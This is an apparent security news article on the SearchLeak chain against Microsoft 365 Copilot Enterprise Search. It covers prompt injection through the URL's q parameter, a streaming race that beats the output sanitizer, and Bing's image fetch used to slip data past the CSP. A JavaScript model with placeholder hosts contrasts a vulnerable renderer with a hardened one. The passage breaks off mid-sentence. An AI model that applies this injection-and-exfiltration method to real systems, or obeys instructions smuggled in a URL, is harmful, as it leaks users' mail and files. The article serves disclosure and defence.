A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search.
Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it.
No prompt, no password, no second click. Microsoft assigned CVE-2026-42824 and rated it critical; the CVSS scores ran lower and disagreed, 6.5 from Microsoft and 7.5 from the National Vulnerability Database. The company mitigated the flaw on its backend, so customers have nothing to worry about, and Varonis presented a proof of concept, not observed exploitation.
Three bugs, one click
Microsoft’s advisory describes the flaw as a command injection that can expose information over a network. In practice, SearchLeak stacks one AI-specific weakness on two old web bugs, and each step is needed for the next.
The entry point is the q parameter in the Copilot Enterprise Search URL. It is meant for a natural-language query, but Copilot reads whatever sits there as instructions, not just a search string.
Varonis calls this Parameter-to-Prompt injection. An attacker writes a URL that tells Copilot to search the mailbox, take an email title, and place it inside an image URL. The victim types nothing. They click, and Copilot does the work.
Next is a race condition in how the response renders. Microsoft’s guardrail wraps Copilot output in blocks so the browser treats markup as text. The catch is timing: the wrapping happens after Copilot finishes generating, but the browser renders the stream as it arrives. The injected tag is drawn and fires its request before the sanitizer runs. By the time the output is neutralized, the request has already left.
The last link gets the data past the page’s Content Security Policy. The CSP on m365.cloud.microsoft blocks images from arbitrary domains, but it allowlists *.bing.com. Bing’s “Search by Image” endpoint accepts an image URL and fetches it server-side to analyze it. Point that fetch at an attacker’s server with the stolen text encoded in the path, and Bing retrieves it. The browser’s CSP never applies, because the request comes from Bing’s infrastructure. Bing becomes the exfiltration proxy. The CSP allowlist does the hiding.
Put together: the victim clicks, Copilot searches their data, the response embeds a value like an email subject in a Bing image URL, the browser calls Bing during streaming, and Bing pulls the attacker’s URL. The attacker reads it off their own logs, for example, a request for /Your_Security_Code_847291/img.png.
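The timing bug is easiest to see by modelling the renderer. The example below is added here and is not code from Varonis, Microsoft or the Copilot front end; it imitates a streaming response that is appended to the page chunk by chunk and escaped only after the stream completes, beside a renderer that escapes every chunk before it reaches the DOM. The stream, the proxy host and the collector host are constructed placeholders, and the "active tag" check stands in for the browser parser deciding an image element is complete enough to fetch.

```javascript
// Constructed stream: three chunks that together form one complete <img>
// element, followed by a trailing text chunk. Hosts are placeholders.
const CONSTRUCTED_STREAM = [
  'Top result: ',
  '<img src="https://img-proxy.example/fetch?url=',
  'https://collector.example/Quarterly_Results/i.png">',
  ' (1 item found)',
];

// Minimal HTML entity escaping so markup is shown as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Stand-in for the browser parser: a complete <img src="..."> element is
// enough for the browser to issue the request.
function containsActiveTag(html) {
  return /<img\b[^>]*\bsrc="[^"]*"[^>]*>/i.test(html);
}

// Vulnerable renderer: each chunk is appended as raw markup while streaming,
// and the guardrail (escape and wrap) runs only once the stream has ended.
// Returns every intermediate frame the page would have shown.
function renderVulnerable(chunks) {
  const frames = [];
  let buf = '';
  for (const c of chunks) {
    buf += c;            // raw markup reaches the page immediately
    frames.push(buf);
  }
  frames.push('<pre><code>' + escapeHtml(buf) + '</code></pre>'); // too late
  return frames;
}

// Hardened renderer: every chunk is escaped before it is appended, so no
// frame ever contains parseable markup, whatever the timing.
function renderHardened(chunks) {
  const frames = [];
  let buf = '';
  for (const c of chunks) {
    buf += escapeHtml(c);
    frames.push('<pre><code>' + buf + '</code></pre>');
  }
  return frames;
}

// Number of frames during which the browser would already have fired the
// image request; zero means the guardrail had no window to miss.
function exposureWindow(frames) {
  return frames.filter(containsActiveTag).length;
}

// Stand-alone run: vulnerable renderer exposes the tag for 2 frames, hardened for 0.
console.log('vulnerable frames with live tag:', exposureWindow(renderVulnerable(CONSTRUCTED_STREAM)));
console.log('hardened frames with live tag:  ', exposureWindow(renderHardened(CONSTRUCTED_STREAM)));
```

The point of the model is that a sanitizer which runs on the finished output does not protect a page that paints partial output; the escaping has to happen on the same path the chunks take into the DOM, or the output has to be rendered as text (textContent rather than innerHTML) from the first byte.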
What an attacker gets
Copilot Enterprise can reach whatever the signed-in user can, through their Microsoft Graph access, and the attacker inherits that reach without ever logging in.
The most…